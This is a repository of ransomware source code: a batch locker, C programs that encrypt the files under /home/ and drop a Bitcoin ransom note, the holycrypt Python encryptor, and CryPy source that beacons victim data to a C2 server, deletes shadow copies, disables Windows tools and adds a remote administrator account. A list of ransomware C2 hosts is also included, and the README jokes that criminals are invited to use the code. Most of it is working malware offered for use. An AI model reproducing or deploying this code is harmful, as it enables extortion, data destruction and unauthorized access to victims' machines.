├── batch_ransom_example.txt
├── README.md
├── decrypter.c
├── holycrypt-v0.3.py
├── encrypter.c
├── c2serverlist.txt
└── CryPy_Source.py


/batch_ransom_example.txt:
--------------------------------------------------------------------------------
 1 | @echo off
 2 | title any title here
 3 | color 4
 4 | echo 
 5 | PING 127.0.0.1 -n 1 -w 3000 >NUL
 6 | color 0a
 7 | PING 127.0.0.1 -n 1 -w 3000 >NUL
 8 | set /p username=enter computer username:
 9 | net user %username% set password for ransomware here
10 | echo
11 | echo
12 | echo
13 | echo RansomWare enabled, contact information here so you can make a deal with the infected owner
14 | echo
15 | echo
16 | PING 127.0.0.1 -n 1 -w 1500 >NUL
17 | :k
18 | taskkill /f /im explorer.exe
19 | goto k
20 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Ransomware & Cryptography : Virtual Gangster
 2 | <p align="center">
 3 |   <img src="https://cdn0.iconfinder.com/data/icons/cyber-crime-or-threats-blue-set/120/hacker_cyber_crime-256.png">
 4 | </p>
 5 | 
 6 | # Scripts
 7 | * [CryPy_Source](https://github.com/roothaxor/Ransom/blob/master/CryPy_Source.py)	: Used in wild .crypy ransomware written in python, full source code
 8 | * [batch_ransom_example.txt](https://github.com/roothaxor/Ransom/blob/master/batch_ransom_example.txt) : Proof, ransomware can be coded in batch programming
 9 | * [c2serverlist.txt](https://github.com/roothaxor/Ransom/blob/master/c2serverlist.txt) : C2 servers list distributing the ransomwares in wild update on 1/08/2016
10 | * [decrypter.c](https://github.com/roothaxor/Ransom/blob/master/decrypter.c) : Decryption program for AES256_CBC Encryption, Written in C
11 | * [encrpter.c](https://github.com/roothaxor/Ransom/blob/master/encrypter.c) : Encryption program Using AES256 with CBC cipher mode, Written in C
12 | * [holycrypt-v0.3.py](https://github.com/roothaxor/Ransom/blob/master/holycrypt-v0.3.py) : Holycrypt Ransomware Source code, Dont run this if dont know what it is
13 | 
14 | ### This is not only for educational purpose Criminals are invited to Use it Bad Way. Just Kidding
15 | 


--------------------------------------------------------------------------------
/decrypter.c:
--------------------------------------------------------------------------------
  1 | #include <string.h>
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <dirent.h>
  5 | #include <openssl/evp.h>
  6 | #include <openssl/aes.h>
  7 | 
  8 | 
  9 | void decryptfile(FILE * fpin,FILE* fpout,unsigned char* key, unsigned char* iv);
 10 | void ls_dir(char* start_path);
 11 | 
 12 | void main()
 13 | {
 14 | 
 15 |         char* start_path;
 16 |         start_path = "/home/";
 17 |         ls_dir(start_path);
 18 | }
 19 | 
 20 | void ls_dir(char* start_path)
 21 | {
 22 | 	unsigned char key[] = "12345678901234561234567890123456"; //32 chars long
 23 |     unsigned char iv[] = "1234567890123456";//16 chars long
 24 | 	DIR* dir;
 25 | 	struct dirent *ent;
 26 | 	if((dir=opendir(start_path)) !=NULL)
 27 | 	{
 28 | 		while((ent=readdir(dir)) !=NULL)
 29 | 		{
 30 | 
 31 | 			if(ent->d_type == 8)
 32 | 			{
 33 | 
 34 | 				int len = strlen(ent->d_name);
 35 | 				const char* last_four = &ent->d_name[len-4];
 36 | 				if(strcmp(last_four,".enc") == 0)
 37 | 				{
 38 | 
 39 | 					char* full_path =(char*) malloc(strlen(ent->d_name)+strlen(start_path)+2);
 40 | 					strcpy(full_path,start_path);
 41 | 					strcat(full_path,ent->d_name);
 42 | 					char* new_name = (char*) malloc(strlen(full_path)+1);
 43 | 					strcpy(new_name,full_path);
 44 | 					new_name[strlen(new_name)-4] = '\0';
 45 | 
 46 | 					FILE* fpin;
 47 | 					FILE* fpout;
 48 | 
 49 | 					fpin=fopen(full_path,"rb");
 50 | 					fpout=fopen(new_name,"wb");
 51 | 
 52 | 					decryptfile(fpin,fpout,key,iv);
 53 | 					if(fpin != NULL)
 54 | 						fclose(fpin);
 55 | 					if(fpout != NULL)
 56 | 						fclose(fpout);
 57 | 					
 58 | 					remove(full_path);
 59 | 					free(full_path);
 60 | 					free(new_name);
 61 | 
 62 | 
 63 | 				}
 64 | 	
 65 | 
 66 | 			}
 67 | 
 68 | 			if(ent->d_type ==4)
 69 | 			{
 70 | 
 71 | 				char *full_path=(char*) malloc(strlen(start_path)+strlen(ent->d_name)+2);
 72 | 				strcpy(full_path,start_path);
 73 | 				strcat(full_path,ent->d_name);
 74 | 				strcat(full_path,"/");
 75 | 				
 76 | 				if(full_path != start_path && ent->d_name[0] != '.')
 77 | 				{	
 78 | 					printf("%s\n",full_path);
 79 | 					ls_dir(full_path);
 80 | 				}
 81 | 				free(full_path);
 82 | 			}
 83 | 
 84 | 		}
 85 | 	}
 86 | }
 87 | 
 88 | 
 89 | 
 90 | void decryptfile(FILE * fpin,FILE* fpout,unsigned char* key, unsigned char* iv)
 91 | {
 92 | 	//Using openssl EVP to encrypt a file
 93 | 
 94 | 
 95 | 	const unsigned bufsize = 4096; // bytes to read
 96 | 	unsigned char* read_buf = malloc(bufsize); // buffer to hold file text
 97 | 	unsigned char* cipher_buf ;// decrypted text
 98 | 	unsigned blocksize;
 99 | 	int out_len;
100 | 
101 | 	EVP_CIPHER_CTX ctx;
102 | 
103 | 	EVP_CipherInit(&ctx,EVP_aes_256_cbc(),key,iv,0); // 0 = decrypt 	1= encrypt
104 | 	blocksize = EVP_CIPHER_CTX_block_size(&ctx);
105 | 	cipher_buf = malloc(bufsize+blocksize);
106 | 
107 | 	// read file and write encrypted file until eof
108 | 	while(1)
109 | 	{
110 | 		int bytes_read = fread(read_buf,sizeof(unsigned char),bufsize,fpin);
111 | 		EVP_CipherUpdate(&ctx,cipher_buf,&out_len,read_buf, bytes_read);
112 | 		fwrite(cipher_buf,sizeof(unsigned char),out_len,fpout);
113 | 		if(bytes_read < bufsize)
114 | 		{
115 | 			break;//EOF
116 | 		}
117 | 	}
118 | 
119 | 	EVP_CipherFinal(&ctx,cipher_buf,&out_len);
120 | 	fwrite(cipher_buf,sizeof(unsigned char),out_len,fpout);
121 | 
122 | 	free(cipher_buf);
123 | 	free(read_buf);
124 | }
125 | 
126 | 


--------------------------------------------------------------------------------
/holycrypt-v0.3.py:
--------------------------------------------------------------------------------
  1 | from Crypto.Hash import SHA256
  2 | from Crypto.Cipher import AES
  3 | import os, random, sys
  4 | 
  5 | def encrypt(key, FileName):
  6 |     chunkS = 64 * 1024
  7 |     OutputFile = os.path.join(os.path.dirname(FileName), "(encrypted)" + os.path.basename(FileName))
  8 |     Fsize = str(os.path.getsize(FileName)).zfill(16)
  9 |     IniVect = ''
 10 |     
 11 |     for i in range(16):
 12 |         IniVect += chr(random.randint(0, 0xFF))
 13 |         
 14 |     encryptor = AES.new(key, AES.MODE_CBC, IniVect)
 15 |     
 16 |     with open(FileName, "rb") as infile:
 17 |         with open(OutputFile, "wb") as  outfile:
 18 |             outfile.write(Fsize)
 19 |             outfile.write(IniVect)
 20 |             while True:
 21 |                 chunk = infile.read(chunkS)
 22 |                 
 23 |                 if len(chunk) == 0:
 24 |                     break
 25 |                 elif len(chunk) % 16 !=0:
 26 |                     chunk += ' ' * (16 - (len(chunk) % 16)) 
 27 |                 outfile.write(encryptor.encrypt(chunk))
 28 | 
 29 | def decrypt(key, FileName):
 30 |     OutputFile = os.path.join(os.path.dirname(FileName), os.path.basename(FileName[11:]))
 31 |     chunkS = 64 * 1024
 32 |     with open(FileName, "rb") as infile:
 33 |         fileS = infile.read(16)
 34 |         IniVect = infile.read(16)
 35 |         
 36 |         decryptor = AES.new(key, AES.MODE_CBC, IniVect)
 37 |         
 38 |         with open(OutputFile, "wb") as outfile:
 39 |             while True:
 40 |                 chunk = infile.read(chunkS)
 41 |                 if len(chunk) == 0:
 42 |                     break
 43 |                 outfile.write(decryptor.decrypt(chunk))
 44 |             outfile.truncate(int(fileS))
 45 |         
 46 | 
 47 | def getDigest(password):
 48 |     hasher = SHA256.new(password)
 49 |     return hasher.digest()
 50 | 
 51 | def files2crypt(path):
 52 |     allFiles = []
 53 |     for root, subfiles, files in os.walk(path):
 54 |         for names in files:
 55 |             if names == "holycrypt.py":
 56 |                 continue
 57 |             allFiles.append(os.path.join(root, names))
 58 |     return allFiles
 59 | 
 60 | def Main():
 61 | 	username = os.getenv('username')
 62 | 	path2crypt = 'C:/Users/' + username
 63 | 	
 64 | 	valid_extension = [".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"]
 65 | 	
 66 | 	choice = 'E'
 67 | 	password = 'test'
 68 | 	encFiles = files2crypt(path2crypt)
 69 | 	if choice == "E":
 70 | 		for file_pnt in encFiles:
 71 | 			if os.path.basename(file_pnt).startswith("(encrypted)"):
 72 | 				print "%s is already ENC" %str(file_pnt)
 73 | 				pass
 74 | 			else:
 75 | 				extension  = os.path.splitext(file_pnt)[1]
 76 | 				if extension in valid_extension:
 77 | 					try:
 78 | 						encrypt(getDigest(password), str(file_pnt))
 79 | 						os.remove(file_pnt)
 80 | 					except:
 81 | 						pass
 82 | 		set_alert_wallpaper()
 83 |     
 84 | 				
 85 | 	elif choice == "D":
 86 | 		filename = raw_input("Filename to DEC: ")
 87 | 		if not os.path.exists(filename):
 88 | 			print "Not exist!"
 89 | 			sys.exit(0)
 90 | 		elif not filename.startswith("(encrypted)"):
 91 | 			print "%s is already not DEC" %filename
 92 | 			sys.exit()
 93 | 		else:
 94 | 			decrypt(getDigest(password), filename)
 95 | 			s = str(getDigest(password))
 96 | 			os.remove(filename)
 97 | 			
 98 | 	else:
 99 | 		print "Invalid choice!"
100 | 		sys.exit
101 | 		sys.exit
102 |         
103 | if __name__ == '__main__':
104 |     Main()
105 | 


--------------------------------------------------------------------------------
/encrypter.c:
--------------------------------------------------------------------------------
  1 | #include <string.h>
  2 | #include <stdio.h>
  3 | #include <stdlib.h>
  4 | #include <dirent.h>
  5 | #include <openssl/evp.h>
  6 | #include <openssl/aes.h>
  7 | 
  8 | 
  9 | void ls_dir(char* start_path);
 10 | void encryptfile(FILE * fpin,FILE* fpout,unsigned char* key, unsigned char* iv);
 11 | 
 12 | 
 13 | int main()
 14 | {
 15 |    
 16 | 	
 17 | 	char* start_path;
 18 | 	start_path = "/home/";
 19 |     ls_dir(start_path);
 20 | 
 21 |     return 0;
 22 | }
 23 | 
 24 | void ls_dir(char* start_path)
 25 | {
 26 | 	unsigned char key[] = "12345678901234561234567890123456";// 32 char 256bit key
 27 |     unsigned char iv[] = "1234567890123456";//same size as block 16 char 128 bit block
 28 | 
 29 | 	DIR* dir;
 30 | 	struct dirent *ent;
 31 | 	if((dir=opendir(start_path)) !=NULL)
 32 | 	{
 33 | 		while((ent=readdir(dir)) !=NULL)
 34 | 		{
 35 | 			int len = strlen(ent->d_name);
 36 | 			const char* last_four = &ent->d_name[len-4];
 37 | 			if(strcmp(last_four,".enc") != 0)
 38 | 			{
 39 | 				if(ent->d_type == 8)
 40 | 				{
 41 | 					char* full_path_readme =(char*) malloc(strlen("RANSOMEWARE_INFO")+strlen(start_path)+2);
 42 | 					strcpy(full_path_readme,start_path);
 43 | 					strcat(full_path_readme,"RANSOMEWARE_INFO");
 44 | 					char* full_path =(char*) malloc(strlen(ent->d_name)+strlen(start_path)+2);
 45 | 					strcpy(full_path,start_path);
 46 | 					strcat(full_path,ent->d_name);
 47 | 					char* new_name = (char*) malloc(strlen(full_path)+strlen(".enc")+1);
 48 | 					strcpy(new_name,full_path);
 49 | 					strcat(new_name,".enc");
 50 | 					if(strcmp(full_path,"/etc/passwd") !=0 && strcmp(full_path,"/etc/shadow")!=0 && strcmp(full_path,"/etc/sudoers") !=0)
 51 | 					{
 52 | 						FILE* fpin;
 53 | 						FILE* fpout;
 54 | 						FILE* fpreadme;
 55 | 					
 56 | 						
 57 | 						fpin=fopen(full_path,"rb");
 58 | 						fpout=fopen(new_name,"wb");
 59 | 						fpreadme=fopen(full_path_readme,"w");
 60 | 						
 61 | 						fprintf(fpreadme,"You have been PWNED! \n\n hehehehexD. Only Two Ways here.\n\n 1. Tranfer money to my bitcoin address \n 2. Email me with your bitcoin address that you used to send the money. Then I will email with an Decrpter \n\n Send 0.5btc now \n My Bitcoin Address:13dYMSYXL1BbFbicKM3jD78QN1ERckcXL4\n Email:root@roothaxor.com \n");
 62 | 						fclose(fpreadme);
 63 | 						
 64 | 						encryptfile(fpin,fpout,key,iv);
 65 | 
 66 | 						fclose(fpin);
 67 | 						fclose(fpout);
 68 | 						remove(full_path);
 69 | 					}
 70 | 					free(full_path);
 71 | 					free(new_name);
 72 | 				}
 73 | 				else if(ent->d_type==4)
 74 | 				{
 75 | 
 76 | 					char *full_path=(char*) malloc(strlen(start_path)+strlen(ent->d_name)+2);
 77 | 					strcpy(full_path,start_path);
 78 | 					strcat(full_path,ent->d_name);
 79 | 					strcat(full_path,"/");
 80 | 					printf("%s\n",full_path);
 81 | 					if(full_path != start_path && ent->d_name[0] != '.')
 82 | 					{
 83 | 						ls_dir(full_path);
 84 | 					}
 85 | 					
 86 | 					free(full_path);
 87 | 
 88 | 
 89 | 				}
 90 | 
 91 | 			}
 92 | 		}
 93 | 	}
 94 | 
 95 | }
 96 | void encryptfile(FILE * fpin,FILE* fpout,unsigned char* key, unsigned char* iv)
 97 | {
 98 | 	//Using openssl EVP to encrypt a file
 99 | 
100 | 	
101 | 	const unsigned bufsize = 4096;
102 | 	unsigned char* read_buf = malloc(bufsize);
103 | 	unsigned char* cipher_buf ;
104 | 	unsigned blocksize;
105 | 	int out_len;
106 | 
107 | 	EVP_CIPHER_CTX ctx;
108 | 
109 | 	EVP_CipherInit(&ctx,EVP_aes_256_cbc(),key,iv,1);
110 | 	blocksize = EVP_CIPHER_CTX_block_size(&ctx);
111 | 	cipher_buf = malloc(bufsize+blocksize);
112 | 
113 | 	// read file and write encrypted file until eof
114 | 	while(1)
115 | 	{
116 | 		int bytes_read = fread(read_buf,sizeof(unsigned char),bufsize,fpin);
117 | 		EVP_CipherUpdate(&ctx,cipher_buf,&out_len,read_buf, bytes_read);
118 | 		fwrite(cipher_buf,sizeof(unsigned char),out_len,fpout);
119 | 		if(bytes_read < bufsize)
120 | 		{
121 | 			break;//EOF
122 | 		}
123 | 	}
124 | 
125 | 	EVP_CipherFinal(&ctx,cipher_buf,&out_len);
126 | 	fwrite(cipher_buf,sizeof(unsigned char),out_len,fpout);
127 | 
128 | 	free(cipher_buf);
129 | 	free(read_buf);
130 | }


--------------------------------------------------------------------------------
/c2serverlist.txt:
--------------------------------------------------------------------------------
  1 | Here Are Some OF C2 servers list which are wildly used nowdays 
  2 | 
  3 | Stay safe by blocking these servers
  4 | Ransomware C2 Servers Collection
  5 | 
  6 | Credit to BleepingComputer, Cisco Blog, WooYun, Servers & IPs are collected from Internet.
  7 | !!!NO CLICK IN THE URLS IN YOUR IMPORTANT WINDOWS COMPUTER, OR ALL YOUR DATA MAY BE ENCRYPTED BY HACKERS FOREVER AND NEVER BE DECRYPTED!!! 
  8 | 
  9 | #####TeslaCrypt
 10 | 3m3q.org/wstr.php
 11 | biocarbon.com.ec/wp-content/uploads/bstr.php
 12 | biocarbon.com.ec/wp-content/uploads/bstr.php
 13 | conspec.us/wp-content/plugins/nextgen-galleryOLD/products/photocrati_nextgen/modules/i18n/wstr.php
 14 | gianservizi.it/wp-content/uploads/wstr.php
 15 | goktugyeli.com/wstr.php
 16 | imagescroll.com/cgi-bin/Templates/bstr.php
 17 | iqinternal.com/pmtsys/fonts/wstr.php
 18 | music.mbsaeger.com/music/Glee/bstr.php
 19 | newculturemediablog.com/wp-includes/fonts/wstr.php
 20 | opravnatramvaji.cz/modules/mod_search/wstr.php
 21 | ptlchemicaltrading.com/images/gallery/wstr.php
 22 | ricardomendezabogado.com/components/com_imageshow/wstr.php
 23 | saludaonline.com/wstr.php
 24 | stacon.eu/bstr.php
 25 | suratjualan.com/copywriting.my/image/wstr.php
 26 | surrogacyandadoption.com/bstr.php
 27 | tmfilms.net/wp-content/plugins/binary.php
 28 | worldisonefamily.info/zz/libraries/bstr.php
 29 | 7tno4hib47vlep5o.63ghdye17.com
 30 | 7tno4hib47vlep5o.79fhdm16.com
 31 | 7tno4hib47vlep5o.tor2web.blutmagie.de
 32 | 7tno4hib47vlep5o.tor2web.fi
 33 | 38.229.70.4
 34 | 82.130.26.27
 35 | 192.251.226.206
 36 | multibrandphone.com
 37 | vtechshop.net
 38 | sappmtraining.com
 39 | shirongfeng.cn
 40 | controlfreaknetworks.com
 41 | tele-channel.com
 42 | Joecockerhereqq.com
 43 | blizzbauta.com
 44 | yesitisqqq.com
 45 | howareyouqq.com
 46 | thisisitsqq.com
 47 | blablaworldqq.com
 48 | fromjamaicaqq.com
 49 | hellomydearqq.com
 50 | witchbehereqq.com
 51 | arendroukysdqq.com
 52 | itisverygoodqq.com
 53 | goonwithmazerqq.com
 54 | helloyoungmanqq.com
 55 | invoiceholderqq.com
 56 | mafianeedsyouqq.com
 57 | mafiawantsyouqq.com
 58 | soclosebutyetqq.com
 59 | isthereanybodyqq.com
 60 | lenovomaybenotqq.com
 61 | lenovowantsyouqq.com
 62 | hellomississmithqq.com
 63 | thisisyourchangeqq.com
 64 | www.thisisyourchangeqq.com
 65 | gutentagmeinliebeqq.com
 66 | hellomisterbiznesqq.com
 67 | 46.108.108.182
 68 | 54.212.162.6
 69 | 78.135.108.94
 70 | 134.19.180.8
 71 | 202.120.42.190
 72 | 216.150.77.21
 73 | 142.25.97.48
 74 | 202.120.42.190
 75 | 
 76 | ##### Cryptowall 4.0
 77 | abelindia.com/1LaXd8.php
 78 | purposenowacademy.com/5_YQDI.php
 79 | mycampusjuice.com/z9r0qh.php
 80 | theGinGod.com/HS0ILJ.php
 81 | yahoosupportaustralia.com/8gX7hN.php
 82 | successafter60.com/iCqjno.php
 83 | alltimefacts.com/EiFSId.php
 84 | csscott.com/YuF59b.php
 85 | smfinternational.com/eRs70a.php
 86 | lexscheep.com/OIsSCj.php
 87 | successafter60.com/r_kfhH.php
 88 | posrednik-china.com/etdhIk.php
 89 | ks0407.com/VoZQ_j.php
 90 | stwholesaleinc.com/yL54uH.php
 91 | ainahanaudoula.com/GH09Dp.php
 92 | httthanglong.com/yzoLR7.php
 93 | myshop.lk/6872VF.php
 94 | parsimaj.com/60wEBT.php
 95 | kingalter.com/uVRfPv.php
 96 | shrisaisales.in/ZUQce4.php
 97 | cjforudesigns.com/E8B2gt.php
 98 | mabawamathare.org/WEAbCT.php
 99 | manisidhu.in/zJE0fD.php
100 | adcconsulting.net/XEGeuI.php
101 | frc-pr.com/dA91lI.php
102 | localburialinsuranceinfo.com/zDJRc8.phpsmfinternational.com/AYNILr.php
103 | 
104 | ##### Locky 
105 | 51.254.181.122
106 | 51.255.107.8
107 | 78.40.108.39
108 | 149.202.109.205
109 | 46.148.20.32
110 | 95.181.171.58
111 | 185.14.30.97
112 | 195.22.28.196
113 | 195.22.28.198
114 | pvwinlrmwvccuo.eu
115 | cgavqeodnop.it
116 | kqlxtqptsmys.in
117 | wblejsfob.pw
118 | casader.ce
119 | echo509.dedicatedpanel.com
120 | xray730.dedicatedpanel.com
121 | 85.25.138.187
122 | 31.41.47.37
123 | 188.138.88.184
124 | 109.234.38.35
125 | 173.214.183.81
126 | 193.124.181.169
127 | 195.154.241.208
128 | 195.64.154.14
129 | 46.4.239.76
130 | 66.133.129.5
131 | 86.104.134.144
132 | 91.195.12.185
133 | iynus.net
134 | www.iglobali.com
135 | www.jesusdenazaret.com.ve
136 | www.southlife.church
137 | www.villaggio.airwave.at
138 | 195.154.241.208/main.php
139 | 195.154.241.208/main.php
140 | 86.104.134.144/main.php
141 | 193.124.181.169/main.php
142 | 109.234.38.35/main.php
143 | 91.195.12.185/main.php
144 | kpybuhnosdrm.in
145 | sso.anbtr.com
146 | xsso.kpybuhnosdrm.in
147 | xfyubqmldwvuyar.yt
148 | luvenxj.uk
149 | dkoipg.pw
150 | www.iglobali.com/34gf5y/r34f3345g.exe 
151 | www.southlife.church/34gf5y/r34f3345g.exe 
152 | www.villaggio.airwave.at/34gf5y/r34f3345g.exe 
153 | www.jesusdenazaret.com.ve/34gf5y/r34f3345g.exe 
154 | 66.133.129.5/~chuckgilbert/09u8h76f/65fg67n 
155 | 173.214.183.81/~tomorrowhope/09u8h76f/65fg67n 
156 | iynus.net/~test/09u8h76f/65fg67n
157 | 109.234.38.35/main.php 
158 | lneqqkvxxogomu.eu/main.php 
159 | qpdar.pw/main.php 
160 | ydbayd.de/main.php 
161 | ssojravpf.be/main.php 
162 | gioaqjklhoxf.eu/main.php      
163 | txlmnqnunppnpuq.ru/main.php
164 | 5.34.183.136
165 | 91.121.97.170
166 | 
167 | ##### KeRanger
168 | lclebb6kvohlkcml.onion.link
169 | lclebb6kvohlkcml.onion.nu
170 | bmacyzmea723xyaz.onion.link
171 | bmacyzmea723xyaz.onion.nu
172 | nejdtkok7oz5kjoc.onion.link
173 | nejdtkok7oz5kjoc.onion.nu
174 | 
175 | ##### vvv (TeslaCrypt Old Version)
176 | crown.essaudio.pl/media/misc.php
177 | graysonacademy.com/media/misc.php
178 | grupograndes.com/media/misc.php
179 | grassitup.com/media/misc.php
180 | 
181 | ##### CTB-Locker
182 | rmxlqabmvfnw4wp4.onion.gq
183 | 
184 | ##### Cryptowall 3.0
185 | 91.121.12.127:4141
186 | 5.199.165.160:8080
187 | 94.247.28.26:2525
188 | 194.58.109.158:2525
189 | 195.29.106.157:4444
190 | 94.247.31.19:8080
191 | 194.58.109.137:3435
192 | 94.247.28.156:8081
193 | 209.148.85.151:8080
194 | youtubeallin.com	
195 | serbiabboy.com	
196 | hairyhustler.com	
197 | yoyosasa.com	
198 | uprnsme.com	
199 | dealwithhell.com	
200 | wawamediana.com	
201 | qoweiuwea.com	
202 | dominikanabestplace.com	
203 | nofbiatdominicana.com	
204 | dominicanajoker.com	
205 | likeyoudominicana.com	
206 | khalisimilisi.com	
207 | posramosra.com	
208 | maskaradshowdominicana.com	
209 | newsbrontima.com	
210 | yaroshwelcome.com	
211 | granatebit.com	
212 | rearbeab.com	
213 | droterdrotit.com	
214 | kukisasda8121.com	
215 | tyuweirwsdf18741.com	
216 | machetesraka.com	
217 | markizasamvel.com	
218 | wachapikchaid91.com	
219 | hilaryclintonbest81.com	
220 | niggaattack23.com	
221 | norevengenosuck.com	
222 | stopobamastopusa.com	
223 | jiromepic.com	
224 | clocksoffers.com	
225 | gretableta.com	
226 | kaikialexus.com	
227 | babyslutsnil.com	
228 | wartbartmart.com	
229 | la4eversuck.com	
230 | obsesickshit.com	
231 | mamapapafam.com	
232 | usawithgitler.com	
233 | kickasssisters.com	
234 | bdsmwithyou.com	
235 | iampeterbaby.com	
236 | teromasla.com	
237 | torichipinis.com	
238 | gitlerluvua.com	
239 | covermontislol.com	
240 | usaalwayswar.com	
241 | bolizarsospos.com	
242 | titaniumpaladium.com	
243 | adolfforua.com	
244 | vivatsaultppc.com	
245 | milimalipali.com	
246 | poroshenkogitler.com	
247 | waltabaldasd.com	
248 | dancewithmeseniorita.com	
249 | indeedlinkme.com	
250 | crunkthatme.com	
251 | hungarymethis.com	
252 | terrymerry.com	
253 | lvoobptv6w5zanxu.onion	
254 | hyzcrtwh6ispjwj4.onion	
255 | 2yd2bu2k5ilgxv6u.onion	
256 | kpai7ycr7jxqkilp.onion	
257 | 78.110.175.80	
258 | 192.64.115.86	
259 | 5.101.146.182	
260 | 199.188.203.16	
261 | 46.19.143.234	
262 | 162.213.250.163	
263 | 192.64.115.91	
264 | 141.255.167.3	
265 | 199.188.206.202	
266 | 185.12.44.5	
267 | 194.58.101.3	
268 | 192.31.186.3	
269 | 31.31.204.59	
270 | 194.58.101.96	
271 | 194.58.101.112	
272 | 194.58.101.111	
273 | 151.248.124.30	
274 | 199.127.225.232	
275 | charlottesvillehokies.com/wp-content/plugins/g1.php
276 | nabilmachmouchilawfirm.com/wp-content/plugins/g5.php
277 | blog.biocos.dbm-agence.net/wp-content/themes/twentythirteen/g4.php
278 | lauravecchio.com/wp-content/plugins/g3.php
279 | nblandscapers.com.au/wp-content/plugins/g2.php
280 | knowledgebucket.in/wp-content/plugins/g1.php
281 | craft-viet.com.vn/wp-content/plugins/g5.php
282 | khalilsafety.com/wp-content/plugins/g4.php
283 | emssvc.com/wp-content/plugins/g3.php
284 | asianlaw-un.org/wp-content/plugins/g2.php
285 | notifyd.com/wp-content/plugins/g1.php
286 | shannonmariephotographystudio.com/wp-content/plugins/g5.php
287 | jettsettphotography.com/wp-content/plugins/g4.php
288 | julietterose.com/wp-content/plugins/g2.php
289 | shreebalajidecorators.com/wp-content/themes/twentytwelve/g1.php
290 | demo1.wineoox.com/wp-content/plugins/g5.php
291 | greenpowerworksinc.com/wp-content/plugins/g4.php
292 | urbanconnection.us/wp-content/plugins/g3.php
293 | teyneg.com/wp-content/plugins/g2.php
294 | seopain.com.au/wp-content/plugins/g1.php
295 | houseoflevi.org/wp-content/plugins/g4.php
296 | loccidigital.com.br/wp-content/plugins/g3.php
297 | carpetandfloors.co.uk/wp-content/plugins/g2.php
298 | theazores.ro/wp-content/plugins/wp-db-backup-made/g1.php
299 | phulwaribiotech.com/wp-content/plugins/g5.php
300 | afriqinter.com/wp-content/plugins/g4.php
301 | daisylcreations.com/wp-content/plugins/g3.php
302 | interrailturkiye.net/wp-content/plugins/g2.php
303 | lydiaspath2wellness.com/wp-content/plugins/g1.php
304 | 5.178.82.14
305 | 188.93.17.149
306 | 188.93.17.207
307 | 109.234.154.29
308 | 95.213.147.21
309 | 
310 | ##### Cerber
311 | 87.98.128.*
312 | (*=1~13)
313 | 
314 | ##### LeChiffre
315 | 184.107.251.146/sipvoice.php
316 | 
317 | ##### Cryptolocker
318 | 192.210.230.39
319 | 194.28.174.119
320 | 212.71.250.4
321 | 86.124.164.25
322 | 87.255.51.229
323 | 93.189.44.187
324 | 
325 | ##### Kriptovo
326 | plantsroyal.org
327 | ripola.net
328 | valanoice.org
329 | adorephoto.org
330 | jackropely.org
331 | 66.96.147.86
332 | 
333 | Thats all Peeps Next update will be about ransomware Coding.
334 | 


--------------------------------------------------------------------------------
/CryPy_Source.py:
--------------------------------------------------------------------------------
  1 | import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2
  2 | import SintaRegistery
  3 | import SintaChangeWallpaper
  4 | from Crypto import Random
  5 | from Crypto.Cipher import AES
  6 | rmsbrand = 'SintaLocker'
  7 | newextns = 'sinta'
  8 | encfolder = '__SINTA I LOVE YOU__'
  9 | email_con = 'sinpayy@yandex.com'
 10 | btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1'
 11 | userhome = os.path.expanduser('~')
 12 | my_server = 'http://www.dobrebaseny.pl/js/lib/srv/'
 13 | wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg'
 14 | victim_info = base64.b64encode(str(platform.uname()))
 15 | configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname()))
 16 | glob_config = None
 17 | try:
 18 |     glob_config = json.loads(urllib.urlopen(configurl).read())
 19 |     if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']):
 20 |         raise Exception('0x00001')
 21 | except IOError:
 22 |     time.sleep(1)
 23 | 
 24 | victim_id = glob_config[u'MRU_ID']
 25 | victim_r = glob_config[u'MRU_UDP']
 26 | victim_s = glob_config[u'MRU_PDP']
 27 | try:
 28 |     os.system('bcdedit /set {default} recoveryenabled No')
 29 |     os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures')
 30 |     os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
 31 |     os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
 32 |     os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
 33 |     os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f')
 34 | except WindowsError:
 35 |     pass
 36 | 
 37 | def setWallpaper(imageUrl):
 38 |     try:
 39 |         wallpaper = SintaChangeWallpaper.ChangeWallpaper()
 40 |         wallpaper.downloadWallpaper(imageUrl)
 41 |     except:
 42 |         pass
 43 | 
 44 | 
 45 | def persistance():
 46 |     try:
 47 |         SintaRegistery.addRegistery(os.path.realpath(__file__))
 48 |     except:
 49 |         pass
 50 | 
 51 | 
 52 | def destroy_shadow_copy():
 53 |     try:
 54 |         os.system('vssadmin Delete Shadows /All /Quiet')
 55 |     except:
 56 |         pass
 57 | 
 58 | 
 59 | def create_remote_desktop():
 60 |     try:
 61 |         os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f')
 62 |         os.system('net user ' + victim_r + ' ' + victim_s + ' /add')
 63 |         os.system('net localgroup administrators ' + victim_r + ' /add')
 64 |     except:
 65 |         pass
 66 | 
 67 | 
 68 | def write_instruction(dir, ext):
 69 |     try:
 70 |         files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w')
